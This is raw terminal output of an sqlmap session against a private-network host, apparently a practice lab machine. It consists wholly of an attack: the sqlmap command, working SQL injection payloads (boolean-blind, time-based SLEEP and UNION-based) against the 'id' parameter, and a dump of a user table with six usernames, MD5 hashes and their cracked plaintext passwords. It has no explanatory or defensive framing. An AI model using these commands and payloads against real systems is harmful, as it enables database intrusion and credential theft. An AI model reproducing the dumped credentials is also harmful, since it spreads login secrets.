sqlmap -u 'http://192.168.4.136/index.html?page=blog&title=Blog&id=2' -D ehks -T user --dump   
        ___
       __H__                                                                                                        
 ___ ___[,]_____ ___ ___  {1.7.8#stable}                                                                            
|_ -| . [(]     | .'| . |                                                                                           
|___|_  [.]_|_|_|__,|  _|                                                                                           
      |_|V...       |_|   https://sqlmap.org                                                                        

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:28:19 /2023-09-12/

[09:28:19] [INFO] resuming back-end DBMS 'mysql' 
[09:28:19] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=blog&title=Blog&id=2 AND 8711=8711

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=blog&title=Blog&id=2 AND (SELECT 2405 FROM (SELECT(SLEEP(5)))Xqim)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: page=blog&title=Blog&id=2 UNION ALL SELECT NULL,NULL,CONCAT(0x7178717171,0x776d517141635356746e4b45794f544d7173506771655869614a47424f545569786b77566b514959,0x716b707171),NULL,NULL-- -
---
[09:28:19] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 5 (Bordeaux)
web application technology: PHP 5.1.2, Apache 2.2.0
back-end DBMS: MySQL >= 5.0.12
[09:28:19] [INFO] fetching columns for table 'user' in database 'ehks'
[09:28:19] [INFO] fetching entries for table 'user' in database 'ehks'
[09:28:19] [INFO] recognized possible password hashes in column 'user_pass'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[09:28:22] [INFO] writing hashes to a temporary file '/tmp/sqlmapk6uehtfg4811/sqlmaphashes-_dhhc95l.txt' 
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[09:28:25] [INFO] using hash method 'md5_generic_passwd'
[09:28:25] [INFO] resuming password 'ilike2surf' for hash '02e823a15a392b5aa4ff4ccb9060fa68' for user 'dstevens'
[09:28:25] [INFO] resuming password 'seventysixers' for hash 'b46265f1e7faa3beab09db5c28739380' for user 'achen'
[09:28:25] [INFO] resuming password 'Homesite' for hash '8f4743c04ed8e5f39166a81f26319bb5' for user 'pmoore'
[09:28:25] [INFO] resuming password 'Sue1978' for hash '7c7bc9f465d86b8164686ebb5151a717' for user 'jdurbin'
[09:28:25] [INFO] resuming password 'pacman' for hash '64d1f88b9b276aece4b0edcc25b7a434' for user 'sorzek'
[09:28:25] [INFO] resuming password 'undone1' for hash '9f3eb3087298ff21843cc4e013cf355f' for user 'ghighland'
Database: ehks
Table: user
[6 entries]
+---------+-----------+--------------------------------------------------+
| user_id | user_name | user_pass                                        |
+---------+-----------+--------------------------------------------------+
| 1       | dstevens  | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf)    |
| 2       | achen     | b46265f1e7faa3beab09db5c28739380 (seventysixers) |
| 3       | pmoore    | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite)      |
| 4       | jdurbin   | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978)       |
| 5       | sorzek    | 64d1f88b9b276aece4b0edcc25b7a434 (pacman)        |
| 6       | ghighland | 9f3eb3087298ff21843cc4e013cf355f (undone1)       |
+---------+-----------+--------------------------------------------------+

[09:28:25] [INFO] table 'ehks.`user`' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.4.136/dump/ehks/user.csv'                                                                                                            
[09:28:25] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.4.136'

[*] ending @ 09:28:25 /2023-09-12/
